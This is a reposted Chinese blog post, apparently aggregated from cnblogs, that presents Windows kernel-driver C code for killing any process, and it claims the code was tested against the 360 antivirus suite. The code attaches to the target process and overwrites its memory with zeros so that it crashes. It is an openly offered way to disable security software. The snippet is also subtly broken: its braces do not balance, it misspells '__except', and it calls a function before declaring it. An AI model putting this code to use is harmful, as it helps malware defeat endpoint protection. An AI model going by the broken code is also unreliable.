當(dāng)前位置：首頁(yè) > 运维知识 > windows >内容正文

windows

windows内核中杀任意进程，可杀360！

發(fā)布時(shí)間：2025/7/14 windows 13 豆豆

生活随笔收集整理的這篇文章主要介紹了 windows内核中杀任意进程，可杀360！小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

廢話(huà)不多說(shuō) 先上代碼。

static void DProKill(HANDLE pid){

PEPROCESS pe = DProPid2Eprocess(pid);

if (NULL == pe) {

return ;

}

KeAttachProcess(pe); //這里改為指定進(jìn)程的 EPROCESS

for(int i=0x10000;i<0x20000000;i+=PAGE_SIZE) {

__try {

memset((addr_t)i,0,PAGE_SIZE); //把進(jìn)程內(nèi)存全部置零

}

_except(1) {

;

}

KeDetachProcess();

}

static PEPROCESS DProPid2Eprocess(HANDLE pid){

PEPROCESS ret = NULL;

if (NT_SUCCESS(PsLookupProcessByProcessId(pid,&ret))){

return ret;

}

return NULL;

}

原理就是到目標(biāo)進(jìn)程空間各種破壞內(nèi)存，讓其崩潰，親測(cè)360可殺。

歡迎關(guān)注 windows驅(qū)動(dòng)編程微信公眾號(hào)，微信號(hào)：driverdevelop

轉(zhuǎn)載于:https://www.cnblogs.com/xujinping/p/4912247.html

以上是生活随笔為你收集整理的windows内核中杀任意进程，可杀360！的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。